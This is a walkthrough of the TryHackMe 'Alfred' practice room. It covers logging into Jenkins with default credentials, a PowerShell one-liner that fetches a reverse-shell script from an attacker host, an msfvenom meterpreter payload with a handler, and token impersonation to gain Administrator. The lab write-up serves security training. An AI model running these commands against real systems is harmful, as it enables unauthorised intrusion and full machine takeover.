Link: https://tryhackme.com/room/alfred

Recon

Run nmap [Target Machine IP]

There are 3 ports open (TCP connect).

Open [Target Machine IP]:80 and [Target Machine IP]:8080.

[Target Machine IP]:8080 is a login page to Jenkins. Google for the default password of Jenkins (admin:admin).

Once you login, you will see a build. If you look at the build job, you can see that this is a Windows machine. Configure the job and insert the reverse shell to the build command:

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

Download this powershell in attacker machine and host the file with python server (port 8888).

Run nc -lvnp 4444 in attacker machine. Then trigger a build in this job.

We will get a shell from the Target machine. Look for the user.txt (usually it is in the one of the user’s document or desktop folder).

Th

e text contains:

Upgrade shell

Generate a payload

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[ATTACKER IP] LPORT=3333 -f exe -o shell.exe

Open the msfconsole in attacker machine and run these commands (line by line):

msfconsole
use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST [ATTACKER IP] 
set LPORT 3333
run

Download the shell.exe into the Target machine using Jenkins.

powershell "(New-Object System.Net.WebClient).Downloadfile('http://[ATTACKER IP]:8888/shell.exe','shell.exe')"

In the machine, run Start-Process shell.exe to upgrade the shell.

If this is successful, you will see the output in the msfconsole

Privilege Escalation with Access Token

Find out what is the privilege of the user using whoami /priv

In msfconsole, load incognito and run list_tokens -g to find out the available tokens.

Run impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators token

migrate PID-OF-PROCESS

Start a shell.